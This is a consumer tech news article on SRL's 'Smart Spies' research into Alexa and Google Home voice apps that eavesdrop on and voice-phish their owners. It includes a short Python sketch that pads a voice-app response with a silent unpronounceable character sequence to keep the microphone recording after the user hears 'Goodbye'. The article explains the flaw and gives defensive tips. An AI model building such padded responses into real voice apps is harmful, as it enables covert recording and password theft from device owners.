The sneaky new way hackers can use Google Home and Alexa to steal your passwords
Smart speakers are hot items, but their rise to fame hasn’t been squeaky clean. Despite a good reception from critics and users, devices like the Amazon Echo and Google Home have been called out for troubling privacy issues — such as parent companies recording users. Click or tap to see how Google does it.
Makers of smart speakers claim recording users is necessary to improve their AI technology. But beyond playing fast and loose with privacy, recording users opens up an entirely new can of worms: hackers taking advantage of the feature.
Now, security researchers have confirmed the worst. By designing malicious apps, researchers were able to hack the devices and record users at their leisure. This hack confirms bad actors could trick users into giving up private information. Here’s what we know, and what you can do to keep your smart speakers safe.
Smart spies
According to reports by cybersecurity researchers at Security Research Labs (SRL) in Germany, Google Home and Amazon Alexa devices are vulnerable to hacking, which makes them capable of spying on users. Worse, researchers determined the devices can be used to “vish,” or “voice phish,” their owners by using built-in features.
The security flaw has led researchers to dub the devices “Smart Spies,” and it raises serious concerns about how these vulnerabilities could be abused.
Security Research Labs is what the industry calls a “white hat” hacking firm, meaning it hacks devices to help improve security rather than for personal gain. To date, no hackers are known to have exploited the Smart Spies flaw, but unless manufacturers act quickly, millions of users could be at risk.
How can my devices be hacked?
Here’s how it works: Nearly every smart speaker pauses briefly between the moment it finishes listening to you and the moment it begins to speak. By inserting a string of unpronounceable characters into a voice app’s pre-written responses, an attacker can stretch that pause — the device “speaks” the characters as silence while its microphone stays open. This allows the app to keep recording the user without them knowing.
To create the exploit, SRL created an application that artificially extends the pause to allow for easy recording beyond the devices’ pre-determined limits. White hat hackers speculate malicious hackers could easily create an app that utilizes the pause and custom requests, such as asking the user to reset their password by voice. This would put nearly every smart speaker owner in harm’s way.
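To make the padding trick concrete, here is a minimal sketch of how a malicious voice-app response could be assembled. The function and variable names are hypothetical; the unpronounceable sequence (“\ud801. ”, a lone Unicode surrogate followed by a period and space) is the one SRL reported text-to-speech engines render as silence.

```python
# Sketch of the "Smart Spies" padding trick. All names are hypothetical;
# the silent sequence is the one reported by SRL.

SILENT_SEQUENCE = "\ud801. "  # lone surrogate U+D801 + ". " -- spoken as silence


def build_eavesdrop_response(audible_text: str, repeats: int = 40) -> str:
    """Return a voice-app response that says `audible_text`, then 'speaks'
    silence repeatedly, keeping the session (and microphone) open far
    longer than the user expects."""
    return audible_text + SILENT_SEQUENCE * repeats


# The user hears only "Goodbye!" -- the device then appears idle
# while the session is still live and listening.
response = build_eavesdrop_response("Goodbye!")
```

A review process that scanned submitted responses for unpronounceable or non-printing characters could flag exactly this kind of payload — which is why SRL’s criticism focuses on the app-store approval pipeline.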
In an interesting twist, SRL specifically cites issues with the approval process at Google and Amazon as a major risk factor. To keep users safe, the researchers call for “…a more thorough review process of (the) third-party Skills and Actions made available in their voice app stores.”
Judging by the presence of malicious apps on Google’s own app store, we’d say this is a significant concern. Click or tap to see some of the malicious apps discovered on the Google Play store.
How can I keep my smart speakers safe from this flaw?
As SRL eloquently put it, it’s the responsibility of manufacturers like Google and Amazon to keep their respective marketplaces free from malicious apps. In addition, these companies may want to re-evaluate their code structures for Alexa and Google Assistant to make sure factors like the “pause” aren’t exploited.
To keep your own devices safe, the best thing you can do is make sure you’re only downloading Alexa and Google Assistant apps from trusted developers; otherwise, you’re putting your privacy and safety up for grabs.
In addition, both devices feature “mic off” buttons prominently in their designs. When not in use, it’s always a good idea to turn the mic off. At least for now, Google and Amazon are far more interested in what you have to say than any hacker, but it’s best not to take any chances.
Tags: Amazon, cybersecurity, Google, security